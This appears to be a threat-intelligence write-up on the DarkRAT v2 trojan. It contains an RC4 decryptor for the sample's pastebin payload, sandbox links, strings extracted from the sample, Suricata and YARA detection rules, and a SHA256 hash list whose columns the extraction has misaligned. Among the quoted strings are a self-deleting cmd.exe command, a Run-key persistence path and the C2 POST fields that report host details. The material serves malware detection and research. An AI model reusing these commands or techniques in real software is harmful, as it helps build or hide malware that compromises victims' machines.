4x+9ZolpV9+wS1xxlSmTQfPTglBPsSCsMhq3ceGt gh3nhIKYFaODSrZHXDnzSpo5a6uR1FkMSIpy5g== P0W0jVz9V+mZHlZn8hdG7StZ0IRo18Mi8gwrLWQ= OzE7OWprZGp9e3djcWF4YnxlYHF6NzY0OiwjMA== 8GWOsCTVGdIXE7TlkX0A+50WXcdEfzHdbTSWVNr5 XMtmuwemloM7PN8+9lgqowiS7Q36UkY3RthKWg== EQKv4vx/Q0GD9AjrLI+LrnXEfUVrs+52mPHvY4VaPHnt+A1TGg== AWtxLpEyiaQQitH0C4cvlXddVtquBWulwyOAAaUM 89xoOk5h6JAJbplpn0plrlRI+a0pK9mEedupppY= 2SN57pHzmmAc6WhkQPy/OEicdpjdkrG2IhXZyRditw== 2SN57pHzmjZLsyM2HaniaVPdKcaD06b8IQXNzwY= 2SN57pHzmjNIqjwzAqz/fl/GN4bRjaH8IwQ= P9qpEUWRPpy/X1nMoQCI5p4Y01fWcD26WPkA== Iw+s940h3m8Zjd7mcnammzxV4+XZOn2RM0uZZV6H #7%;y~d.8(1>8,7?'89&2?;,"~9& >&"?� #%7;kld7(.?6e2,&~1. 6."7 hc7BzjmDmm4+ROP4fF6rlDp0bz3d3oAxLWv+AiU= ----- dk7D50YwGDUIzVlxfIMv7MvHyMSx+hhPr1YIiQ4= ysXaSHDTtL90P60xvENuELmkmwVIWHQuwWTc TLBLz7KVoeC0IMTHvwY+Fnt1gzghy0P4jUbMyOI= ZjfaMpfAyNn7Brw0ajZOqR71gAbEUeZ87uNDzT6BUzk9hjVruTGFwKgi k7HkixO7LqFlu4dlJtAiUFAL7jl4xLXyfh7Fyj0= tATvtchuYALVBVr+LkH4wKsKpGjIP42OplF0MZrXL+uIpQFNQA== 5MWttHDEgA6/IK4iQFngwpmSeisqgJqWGH0sV0k= iZ0rCLOxPeo1t7bR9X2OFUmqXd+6SxDGRsW5Wg== yQSaXNknA8x40o9QZjAM28BKOmm7gP5jlbYi7g== t8gca6tBA2QfGrZgaKcE/CLSmY6QId3MGeGLU4w= prCtUtZ/lz5V8auJmiRIQjCz60v2l6hz1ei7vzKM5TCyYw== m93fZdUWpDO95QSK6VEGFUUT/XFQHhWe/tSj4g== keRwrh9WFcFmQWyJNMSKvR5ROys5oFT0QSbi88w= 9jeIQeCYYPMLCZMpaXSM8x9D3reSZd+VDuE8+pgC t8gca6tBAzJIS/onN+df43yZ3JXRa97cDeea wGRmv2tlFuI1ZrqQzqeuVNMGLcF7ltc= **Scripts** ``` # RC4 decryptor pastebin = '3CC2ryd2' decrypted = file('3CC2ryd2.clean','wb') key = 'DE4E24E3E9DEF1F54C1816AC26C18' with open (pastebin, "rb") as pb: data = pb.read() S = range(256) j = 0 for i in range(256): j = (j + S[i] + ord(key[i % len(key)])) % 256 S[i], S[j] = S[j], S[i] i = 0 j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i], S[j] = S[j], S[i] decrypted.write(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) decrypted.close() ``` **Sandbox links** ----- https://hybrid[analysis.com/sample/1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b96](https://hybrid-analysis.com/sample/1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814) 37c92cd07814 https://hybrid[analysis.com/sample/8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5](https://hybrid-analysis.com/sample/8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f) 472bee692f [https://app.any.run/tasks/1f4898f6-f168-45f6-9cde-f4fc3108f6d6/](https://app.any.run/tasks/1f4898f6-f168-45f6-9cde-f4fc3108f6d6/) [https://app.any.run/tasks/4a2be20e-5b9b-4dce-bcbb-6654ccf7458d/](https://app.any.run/tasks/4a2be20e-5b9b-4dce-bcbb-6654ccf7458d/) [https://app.any.run/tasks/76a61009-b93c-404f-b9dd-c5d211c2456b/](https://app.any.run/tasks/76a61009-b93c-404f-b9dd-c5d211c2456b/) [https://app.any.run/tasks/abe2a17b-7d35-4e68-811d-945f5fa58d7c/](https://app.any.run/tasks/abe2a17b-7d35-4e68-811d-945f5fa58d7c/) [https://app.any.run/tasks/cdcc07a8-4bb7-4db2-b14f-e0559273c71f/](https://app.any.run/tasks/cdcc07a8-4bb7-4db2-b14f-e0559273c71f/) [https://app.any.run/tasks/aab8736c-8dc5-4ad0-ba70-5b15c568a47d/](https://app.any.run/tasks/aab8736c-8dc5-4ad0-ba70-5b15c568a47d/) [https://app.any.run/tasks/205d250e-d807-48aa-943b-922d11b1212b/](https://app.any.run/tasks/205d250e-d807-48aa-943b-922d11b1212b/) [https://cape.contextis.com/analysis/84762/](https://cape.contextis.com/analysis/84762/) [https://cape.contextis.com/analysis/84812/](https://cape.contextis.com/analysis/84812/) [https://cape.contextis.com/analysis/85291/](https://cape.contextis.com/analysis/85291/) **Other ASCII strings** ----- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz 2.1.3 (2.2.0) cmd.exe wscript.exe Startup failed, error: Request failed, error: cmd.exe /C ping 127.0.0.1 -n 1 -w 3000 > Nul & Del /f /q "%s" SOFTWARE\Microsoft\Cryptography SOFTWARE\Microsoft\Net Framework Setup\NDP\v2.0.50727 SOFTWARE\Microsoft\Net Framework Setup\NDP\v3.0 SOFTWARE\Microsoft\Net Framework Setup\NDP\v3.5 SOFTWARE\Microsoft\Net Framework Setup\NDP\v4 SOFTWARE\Microsoft\Cryptography MachineGuid Windows Software\Microsoft\Windows\CurrentVersion\Run WinSystem32 NtUnmapViewOfSection IsWow64Process cmd.exe /k start \Microsoft\Windows\ APPDATA .exe /C start C: killpersistence POST request= Content-Type: application/x-www-form-urlencoded text/plain &taskid= &taskstatus= Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 > Mobile/9A334 Safari/7534.48.3 pastebin.com/raw/ https:// http:// ftp:// installed open restart failed success todo **Suricata rules** ----- ``` y _ _ alert tcp any any -> any $HTTP_PORTS (msg:"Darkrat Initial Request"; flow:to_server,established; content:"POST"; http_method; content:"request"; http_uri; content:"request="; http_client_body; reference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2; classtype:trojan-activity; sid:20166304; rev:1; metadata:created_at 2019_08_15;) ET TROJAN Win32/DarkRAT CnC? Activity https://doc.emergingthreats.net/bin/view/Main/2027886 alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Win32/DarkRAT CnC? Activity"; flow:established,to_server; content:"POST"; http_method; content:!".php"; http_uri; content:!"Mozilla"; http_user_agent; pcre:"/^[A-Za-z0-9]{3,10}$/Vs"; content:"request=YUhkcFpEM"; http_client_body; depth:17; fast_pattern; pcre:"/^[A-Za-z0-9\/\+\=]{100,}$/PRsi"; http_header_names; content:!"Referer"; metadata: former_category MALWARE; reference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2; classtype:trojan-activity; sid:2027886; rev:2;) ``` **YARA rules** ----- ``` p rule darkratv2 { meta: author = "Albert Zsigovits" strings: $pdb = "C:\\Users\\darkspider" ascii wide $cmd = "cmd.exe /C ping 127.0.0.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"" ascii wide $guid1 = "SOFTWARE\\Microsoft\\Cryptography" ascii wide $guid2 = "MachineGuid" ascii wide $persi1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide $persi2 = "WinSystem32" ascii wide $bin = "pastebin.com/raw/" ascii wide $import0 = "NtUnmapViewOfSection" ascii wide $import1 = "WriteProcessMemory" ascii wide $import2 = "ResumeThread" ascii wide $import3 = "GetNativeSystemInfo" ascii wide $import4 = "URLOpenBlockingStream" ascii wide $import5 = "VirtualFree" ascii wide $import6 = "VirtualAlloc" ascii wide $import7 = "GetModuleHandle" ascii wide $import8 = "LoadLibrary" ascii wide $import9 = "CreateMutex" ascii wide $vbs0 = "Set objShell = WScript.CreateObject(\"WScript.Shell\")" ascii wide $vbs1 = "Set objWMIService = GetObject(\"winmgmts:\\\\\" & sComputerName & \"\\root\\cimv2\")" ascii wide $vbs2 = "Set objItems = objWMIService.ExecQuery(sQuery)" ascii wide $vbs3 = "sQuery = \"SELECT * FROM Win32_Process\"" ascii wide $vbs4 = "wscript.exe" ascii wide $net0 = "POST" ascii wide $net1 = "&taskid=" ascii wide $net2 = "&taskstatus=" ascii wide $net3 = "&spreadtag=" ascii wide $net4 = "&operingsystem=" ascii wide $net5 = "&arch=" ascii wide $net6 = "&cpuName=" ascii wide $net7 = "&gpuName=" ascii wide $net8 = "&botversion=" ascii wide $net9 = "&antivirus=" ascii wide $net10 = "&netFramework4=" ascii wide $net11 = "&netFramework35=" ascii wide $net12 = "&netFramework3=" ascii wide $net13 = "&netFramework2=" ascii wide $net14 = "&installedRam=" ascii wide $net15 = "&aornot=" ascii wide $net16 = "&computername=" ascii wide $net17 = "hwid=" ascii wide $net18 = "request=" ascii wide condition: $pdb or $cmd or ( all of ($guid*) and all of ($persi*) ) or ( 3 of ($vbs*) ) or ( all of ($import*) and $bin ) or ( all of ($net*) ) } rule Darkrat_bin { meta: ``` ----- ``` p author = "James_inthe_box" reference = "https://github.com/albertzsigovits/malwarewriteups/tree/master/DarkRATv2" date = "2019/08" maltype = "RAT" strings: $string1 = "Set objShell = WScript.CreateObject(\"WScript.Shell\")" $string2 = "&taskstatus=" $string3 = "network reset" $string4 = "text/plain" $string5 = "&antivirus=" $string6 = "request=" $string7 = "&arch=" condition: uint16(0) == 0x5A4D and all of ($string*) and filesize < 600KB } rule Darkrat_mem { meta: description = "Darkrat" author = "James_inthe_box" reference = "https://github.com/albertzsigovits/malwarewriteups/tree/master/DarkRATv2" date = "2019/08" maltype = "RAT" strings: $string1 = "Set objShell = WScript.CreateObject(\"WScript.Shell\")" $string2 = "&taskstatus=" $string3 = "network reset" $string4 = "text/plain" $string5 = "&antivirus=" $string6 = "request=" $string7 = "&arch=" condition: all of ($string*) and filesize > 600KB } ``` _Other YARA rules:_ _[https://pastebin.com/es915exd](https://pastebin.com/es915exd)_ **Hashes** **SHA256** **Compiled** **Size** 07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c 991232 08c63d13d117642c4fda82efd1e4a3ba1468ba6d07eb73a80c96e666701fa004 13 Jun 2019 18:17:13 UTC 0e4a6a03b442efc5ae976ed57d66704e3a6c3393792adc1c1fe6a24d2da2352c 16 Jun 2019 21:29:36 UTC 414720 415744 ----- 0f98572f3fa5b70f51c5d090ff4414e0771414cea3309df33d97e9d675847f69 29 Jun 2019 05:44:02 UTC 1273fd18cfbe2f3caef7b29f749eb14b09cbd48a33e4c24c75c1486a416f66bd 22 Jun 2019 17:33:27 UTC 148a5bcaaea8c74e8871ef82e2e6af584d91ae6ddb4d3b36b710ea0ac41ca999 23 Apr 2019 18:49:43 UTC 1cc4577bbf9ca53ff285ea00ae41288a56e35d4472a97e4d7d65b749bce6ef11 01 Aug 2019 16:00:19 UTC 1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814 02 Jul 2019 19:07:48 UTC 2856f4ff4ac68e06b8712cdb8f8a5319c95d1e2479edf2b80e0d7fd9c2b2e80a 11 May 2018 01:32:07 UTC 2d2402ec680759b43efb1f1e0bc298e88c34da475b49237dede926a67587b5d0 29 Jul 2019 22:05:33 UTC 2810b3924fe9d1f1642bc02c93e06391076341c8c7f8821da95f8a5b3bb14fa7 26 Jul 2019 20:40:31 UTC 2856f4ff4ac68e06b8712cdb8f8a5319c95d1e2479edf2b80e0d7fd9c2b2e80a 11 May 2018 01:32:07 UTC 30689bc02dd60fb674bd2e7f08fa2192d8cbeb94c8ae4c42617a698d53f1781a 09 Jun 2019 18:31:55 UTC 3328f642826f94536ec3db7387be182bdb38c85bc4df23e422d1de465573c6b9 04 Aug 2019 17:03:01 UTC 413fad039e9690ecc857d1c8cf90e132d521cc71d068f4286226affd66daa6e9 12 May 2018 14:19:21 UTC 411648 929280 272897 418304 411648 560128 411648 411648 560128 414208 417727 502784 ----- 72e2948d99856cc42584d095ce79202d4de3141e197d4a94c1e7f3b325c0d4b5 09 Jul 2019 20:04:11 UTC 763793e5725b92f61fbba97d15c8ded2817fb2623171a2db7eef94be5cc6729c 26 Jul 2019 20:42:02 UTC 88aab5d336162ec7acc074535966fc665c85f286bc652f884fd4a25dcdb1f37b 22 Jun 2019 17:33:27 UTC 8b1049117f561f5d4cf56258c7ca17551148e2c63af154ba04d96e1373d7dca0 05 Nov 2018 16:55:31 UTC 8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f 05 Jul 2019 17:55:16 UTC 947461d7441512286618a6742282c2de9825d8295af0b5559bc6520711f476af 03 Jun 2019 19:45:15 UTC 9e65fa0964f3a81940ad88cb3652207e5ad050ac6aa8cadc9ae08f140b354b5f 09 May 2018 18:54:19 UTC a521906d8d60d94b14c63012d8ba7ded69b7bb5bde161c62bce8cc6e78434f8f 26 Jul 2019 20:42:02 UTC bac3002b2f86de531ad50ac9163cad514bbc9d910cfce5fa3e0d6fb13589f05e 26 Apr 1998 12:47:14 UTC cfa7f5ad7247d7d70fbbf4dce873fda9646e1964324e518030793ffa939dbd09 09 Jun 2019 18:31:55 UTC d07f601b72c6f91c1689141934a1c13a256a283db28e0982202e61d7c07b3abb 23 Apr 2019 21:05:04 UTC e5d48c09723b9de123a30c7b1b91987707fc51abcbf97578d7f9d9012157d28d 03 Aug 2019 21:02:54 UTC 412160 411648 410624 525824 411648 475880 531456 177664 556935 410096 272385 418304 ----- f1803ca741edac689dc4bb3cc20d30ea79cdb5198d58347ea71d25ed40c0fec7 22 Jun 2019 17:33:27 UTC f7d4c818939899d54b44929950c3e2b331b3787ceb8f72451c8bc375e0d79ac7 26 Jul 2019 20:42:02 UTC fd07d37e18bc922e5d92aeca2267efeec02599a0e35bfaa1d5dce9e27fae735d 04 Aug 2019 17:03:01 UTC 410624 411648 417792 -----